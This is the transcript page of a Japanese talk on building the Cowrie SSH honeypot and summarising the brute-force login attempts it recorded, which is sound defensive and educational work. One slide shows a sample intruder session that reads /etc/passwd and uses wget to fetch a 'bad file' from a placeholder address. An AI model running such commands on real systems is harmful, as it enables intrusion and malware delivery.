Upgrade to PRO for Only $50/Year—Limited-Time Offer! 🔥
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
SSHハニーポット(Cowrie) つくってあそぼのススメ
Search
pypypyo14
July 06, 2018
Technology
0
55
SSHハニーポット(Cowrie) つくってあそぼのススメ
2018/07/06 インフラ勉強会オンライン登壇
pypypyo14
July 06, 2018
Tweet
Share
More Decks by pypypyo14
See All by pypypyo14
アラート対応で疲弊してるチームがいまできること
pypypyo14
3
4.4k
タツノコハイツ DockerHandsOn
pypypyo14
0
130
Other Decks in Technology
See All in Technology
30分であなたをOmniのファンにしてみせます~分析画面のクリック操作をそのままコード化できるAI-ReadyなBIツール~
sagara
0
180
Database イノベーショントークを振り返る/reinvent-2025-database-innovation-talk-recap
emiki
0
230
チーリンについて
hirotomotaguchi
6
2.1k
多様なデジタルアイデンティティを攻撃からどうやって守るのか / 20251212
ayokura
0
490
Lookerで実現するセキュアな外部データ提供
zozotech
PRO
0
170
「図面」から「法則」へ 〜メタ視点で読み解く現代のソフトウェアアーキテクチャ〜
scova0731
0
350
生成AI活用の型ハンズオン〜顧客課題起点で設計する7つのステップ
yushin_n
0
240
Kiro を用いたペアプロのススメ
taikis
1
320
AIの長期記憶と短期記憶の違いについてAgentCoreを例に深掘ってみた
yakumo
4
450
年間40件以上の登壇を続けて見えた「本当の発信力」/ 20251213 Masaki Okuda
shift_evolve
PRO
1
140
GitHub Copilotを使いこなす 実例に学ぶAIコーディング活用術
74th
3
3.5k
1人1サービス開発しているチームでのClaudeCodeの使い方
noayaoshiro
2
430
Featured
See All Featured
Thoughts on Productivity
jonyablonski
73
5k
Building Adaptive Systems
keathley
44
2.9k
HDC tutorial
michielstock
0
260
The Cult of Friendly URLs
andyhume
79
6.7k
AI in Enterprises - Java and Open Source to the Rescue
ivargrimstad
0
1k
The Language of Interfaces
destraynor
162
25k
How to make the Groovebox
asonas
2
1.8k
Designing for humans not robots
tammielis
254
26k
GraphQLの誤解/rethinking-graphql
sonatard
73
11k
Are puppies a ranking factor?
jonoalderson
0
2.3k
The World Runs on Bad Software
bkeepers
PRO
72
12k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
37
6.2k
Transcript
SSHハニーポット(Cowrie) つくってあそぼのススメ 2018.07.06 おさじ@pypypyo14
自己紹介 おさじ @pypypyo14 人前で喋ることに慣れたいインフラエンジニア ハニーポット初心者 インフラ勉強会 過去の登壇 2018.02.17 独自ドメインのメールアドレスを作ろう
はじめに ハニーポットを 既に触られている方には 物足りない内容です よかったらよりよい遊び方教えてください
はじめに 本セッションのゴール • ハニーポットという楽しいツールの存在を知る • 本物の不正アクセス攻撃ログを見て 楽しい気持ちになる 目次: (質疑込み30分) •
ハニーポットって何? • 低対話型SSHハニーポット Cowrie の紹介 • デモンストレーション • 2日間の不正ログイン情報まとめてみた
ハニーポットって何? Honeypot is nani?
ハニーポットっ て何? ––– wikipedia 概要 • 攻撃者をおびき寄せる「甘い罠」 • 敢えて攻撃を受け、そのログを分析することで
攻撃者の動向分析をしたりするツール
低対話型SSHハニーポット Cowrie の紹介 Cowrie is nani?
Cowrieの紹介 Cowrieとは? • SSHサーバのフリをしてくれる 「低対話型」ハニーポットの一種 • 低対話型:OSやアプリケーションをエミュレート • 高対話型:脆弱性を持つ本物の OSやアプリケーションを利用
何ができるの? • 不正ログインに使用されたログイン情報の記録 • 侵入者がシェルに打ち込んだコマンドの記録&再生 • 侵入者がサーバに置いたファイルの保存
Cowrieの紹介 つまりどういう仕組み? • 悪者が無防備なサーバの22番ポートを狙って侵入… Linuxサーバ 22 任意のuser名 任意のpassword ログイン成功!シェル起動!
-------- user@svr04:~$ cat /etc/passwd user@svr04:~$ wget http://(悪いファイル) ...
Cowrieの紹介 つまりどういう仕組み? • 残念!それは私のCowrieさんだ Linuxサーバ 22 2222 Cowrie xxxxx SSH
(本物) 管理者 シェルは本物ではなくてエミュレートされたもの 侵入者が打ったコマンド等の情報はログに残される
Cowrieの紹介 インストール参考資料 • 公式GitHub(英語) https://github.com/micheloosterhof/cowrie • 発表者がかつてまとめたもの https://qiita.com/pypypyo14/items/f399366b34b8dfcb7aa1 (参考)構築に要求されるインフラスキル •
インターネットにつながる Linuxサーバの用意 • Linux 一般ユーザ作成 • SSHポート番号の変更 • ファイアウォール設定変更 ◦ 必要なポートの解放 ◦ ポートフォワーディング設定 (22 → 2222) python全くわかんなくても何とか構築はできました
デモンストレーション Demonstration
デモンストレー ション どんな感じのログが残るか見てみよう • ログイン情報(txt, json) • 発行したコマンドのログ • おいていったファイル
不正ログイン情報 まとめてみた Access Log Summary
不正ログイン情 報まとめてみた 集計期間 • 2018/7/2(月) 00:00 ~ 7/3(火) 23:59 ※
UTC 集計対象 • アクセス元の国 • ログインユーザID • ログインパスワード
不正ログイン情 報まとめてみた 集計期間 • 2018/7/2(月) 00:00 ~ 7/3(火) 23:59 ※
UTC 集計対象 • アクセス元の国 • ログインユーザID • ログインパスワード ログイン試行回数 27,702件 ユニークIPアドレス 66個(12ヶ国)
不正ログイン情 報まとめてみた • (参考)かっこよい可視化の例(T-Pot)
不正ログイン情 報まとめてみた • (今回)雑な集計の例 ↓ jsonをCSVに雑に変換 +α 温かみのある手作業 ↓ からのピボット
不正ログイン情 報まとめてみた • アクセス元(国別) (日本は私の可能性が結構ある)
不正ログイン情 報まとめてみた • ログインユーザID
不正ログイン情 報まとめてみた • ログインパスワード パスワードはバリエーションに富んでいて 見てて楽しかったので 一緒に見てみましょう
おしまい
pypypyo14
sagara
emiki
hirotomotaguchi
ayokura
zozotech
scova0731
yushin_n
taikis
yakumo
shift_evolve
74th
noayaoshiro
jonyablonski
keathley
michielstock
andyhume
ivargrimstad
destraynor
asonas
tammielis
sonatard
jonoalderson
bkeepers
kevinliebholz
